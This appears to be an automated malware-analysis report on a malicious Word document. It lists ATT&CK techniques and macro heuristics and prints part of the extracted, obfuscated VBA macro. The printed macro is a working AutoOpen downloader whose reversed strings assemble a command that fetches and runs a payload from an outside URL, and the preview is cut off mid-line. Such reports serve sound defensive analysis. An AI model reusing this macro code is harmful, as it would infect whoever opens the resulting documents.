MALICIOUS (Risk Score: 182)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
A critical OLE_VBA_SHELL heuristic fired on the sample, indicating a Shell() call within its VBA macros. An AutoOpen macro is present and configured to execute code, which the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic further supports. Together these strongly suggest the macro is designed to download and execute a secondary payload.
Heuristics (6)

- VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 21707 bytes |

SHA-256 (macros.bas): 041e8d07bf076adc8f8c9bcb968115751f6fdc290153aa254c68d49d818188d7
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lDtHfij"
Sub AutoOpen()
On Error Resume Next
iuiGBRCbK = BwQdTfuRM - cXJaXpKHKqic / (5254674 + NXIUEBfzYHfCj - 6029576 + ccbawZG)
lIjMGuQUf = UbQvXZMKFd - BvVGfFiOGBcOGm / (24915 + suliDbFhHOFF - 547282 + QtvHjMOFb)
oiGZXsMKJ = nUPUvvapnw - zcLrliSzC / (7577338 + mTwzzCipvE - 9269593 + OuAZALJXaGLp)
Application.Run "wihcaNbIj", nJSrrFIEIQ
GvhmJtKHj = hwYvwXHwD - DuwwkJSn / (8689463 + wjHHtCUwf - 362509 + owwNEBFNlPcDzl)
MwkBAbXOT = BoQBvDLSBR - vzjjHMaHA / (3791744 + IVhDjuiaWaf - 5787371 + PkDRhEJB)
End Sub
Function nJSrrFIEIQ()
On Error Resume Next
DsnKEzWoJ = icGUWGHc - IsWtsiaoVjIHzW / (3413779 + ZiLBYAQRfY - 3438448 + RmqRuQWRumH)
ulqPWcvCBm = sBOzcAlF - zwYwbbHcFOUMw / (4290745 + trNjAAanaBIW - 7381407 + oinMnRqRV)
nHWdSk = oOpoXnztf - GlnEFoZJzvT / (1027238 + LRjhALEsbW - 8995026 + mLmPnDOrHKCri)
sbfwLcQoBcF = ZXQiKQjAoTpkil + Mid(StrReverse("oijpOQ'+'E1N}ExbV+xbV1N+E1N}{hctaE1N+E1Nc};kE1N+EQudSzVITGWQMCzzNiZYkWkshAk"), 27, 43)
dBFojMoZ = WoFwiamiPsM - dmuJsEOOA / (2995941 + wtMLMGwvIthQb - 6577476 + jQUfmwVn)
aCODizLb = GmLhuVidGv - DVPZYTwE / (4948394 + WSblYwtUdtdFrF - 5125536 + PBnOEJfbDKAvHS)
EaXFwLdiT = ROZjTkw - WlIdCdziJw / (5564654 + vRLrNnz - 6562943 + zwNKrLrRV)
pDPmBZjkLK = wsjUZzjs + Mid(StrReverse("NItDxbV+E1N CDE1N+E1NSJ5v;)icOdUIlNWlAt"), 13, 23)
vVJkRsihX = FfrwiOGADiWfkN - ZmvTLRGN / (7672462 + RkRBhviKBchGB - 6642649 + kLojzcaFVqqAMR)
zZrENViIb = zSDEMdozVmoU - lbTkMXaFSdoP / (8272710 + vKrvVtVdPCw - 4163287 + wMSzLHrUu)
ksUYWWnb = FnoqajoOpV - toirSbNHMQorGi / (8601795 + jdHzLAnlHhCuwa - 7680556 + zTCYoGsf)
oRQpRvAi = LTiQdvfc + Mid(StrReverse("MWnwaMqVBjSuN/moE1NxbV+xbV+E1Nc.gnirE1N+E1NXODjVnfWXdHsV"), 14, 31)
anfSIwqXZb = WmsBsjkYTKlc - rncULakcVzSj / (3840403 + zqLPRCZd - 6253050 + WvWHHKBw)
jsmsaUJT = kFvkNWhAFBn - UYZliHvTaHO / (1251862 + zPEdUKzVD - 6773548 + EGwskBT)
hnjpooODGW = sjCWwWYCFcD - roSQGdXkqpE / (3277166 + UhcJCjYnmNiut - 1571700 + wIrszFNP)
EGdvHftastw = MiGRwiMihIl + Mid(StrReverse("wmoTWQzDcnd05]rAhC[+98]rAhCunDWaW"), 7, 16)
bSHaRVRhHtf = CtfpEbjVNUQoi - MRjHRocQctFBKE / (1773261 + jRzQozUQ - 1661671 + EMYmOtCERUwTY)
NTIOPUw = QlQlkCQi - BowoSJNw / (3809323 + cjPsqfLzFmoPMt - 8513906 + CijfFYazXzPFkv)
khpWdlWjw = YcUvXAt - FZDKsXlbEw / (3505442 + iMotDJPV - 8626826 + FOKhQmswU)
ljOqYhj = hlHiikDiljbpw + Mid(StrReverse("qjSZDzFVGUHNtRwwsJWnldGIflBiRLqEUsr2E1N+E1N'+'YceE1N+E1Njbo-wr2Y+ucJ+ucJHE"), 3, 38)
tWBTVkHcd = LobrOkXhqTo - KHwjGcS / (9470395 + jiqqbnjWEz - 9309262 + HEwQGGPlbn)
iRikRY = NMXVmnEjzrFc - lBmwoKl / (4276505 + fDCASAVDLtvwc - 5781235 + SwjARwd)
kUMprnAm = csfFTSz - CPVhUSmUE / (2022959 + fLhJIXiirbkFvB - 227204 + InuBlOcsjGw)
wiwpN = JIdFCNhclWKISo + Mid(StrReverse("jrDsOPihpcK[((e'+'cALpeR.)MjjrPXZwujMhLjHXPqWPEnAiHQdJ"), 29, 15)
YwZoG = oGpSKafTsdjJ - KRjocBaw / (5878472 + MnwuDLfZRMQz - 1477449 + aVjRQHjhnzqj)
TRsPI = GFUInJZ - iLfbINEPwsN / (1949691 + NGVIiXAiAAEXEY - 3817593 + EcniJwKApIucSr)
LbJaiYuk = cVIswzz - mZwiLbE / (646080 + kTsPacoRwUTZd - 4549665 + JvbBwjUw)
uzapLSjvnBk = zKOwGAzquiWi + Mid(StrReverse("QwbE1N5v + ucJ+ucJr2YY'+'E1N+E1NixbV+xbVlr2YE1N+E1N +E1xbV+xbVN+E1N cix'+'bV+xbVE1N+xbV+xbucJ+ucJVE1NlbxbV+xbVup:vneJ5v =E1NxbV+AVXkMilJawaCjilJPKSjpLBKk"), 26, 125)
CMMcAEmnFI = EFswwpCtUbCf - fIBlUPzCHIP / (4438398 + sYTdzzuiVXfOK - 1196117 + HbESQYrsGZ)
MIwidAajMw = jZizzcbLwdarbE - wKlWXKJavfDw / (1181767 + AjNDCOVAX - 4974208 + mwJvhkc)
kPcESS = jahGkCmaw - RufVzvzMoZpP / (9612099 + LTkMzfNvaiZn - 3753293 + dAPoWNFfWR)
XfiZaRK = XBILSwZ + Mid(StrReverse("mldob/6E1N+E1NKE1N+E1N53/mocE1N+E1N.'+'42eziE1N+E1Ng/E1N+E1N/:ptth '+'r2Y E1N+E1N= E1N+E1NXE1N+E1NCDE1N+ExbV+xbV1NAJE1N+E1N5v;)E1N+E1N331282 ,ucJ+ucJ00wCIcGrcRbZAtUQq"), 16, 146)
trSADE = uvQSaaTYVTz - JcYjnKBtkjfwTL / (7221356 + tAXJILYiMipN -
```

... (truncated)